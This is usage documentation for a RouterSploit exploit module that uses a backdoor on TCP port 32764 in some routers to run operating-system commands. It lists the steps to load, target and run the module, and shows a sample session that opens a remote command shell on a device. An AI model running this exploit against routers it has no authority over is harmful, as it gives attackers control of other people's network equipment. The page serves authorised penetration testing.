Description
Module exploits backdoor functionality that allows executing commands on operating system level.
Verification Steps
- Start
./rsf.py
- Do:
use exploits/routers/multi/tcp_32764_rce
- Do:
set target [TargetIP]
- Do:
run
- If device is vulnerable it is possible to execute commands on operating system level.
Scenarios
rsf > use exploits/routers/multi/tcp_32764_rce
rsf (TCP-32764 RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (TCP-32764 RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...
[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
cmd > echo test
[*] Executing 'echo test' on the device...
[*] Connection established
test
cmd >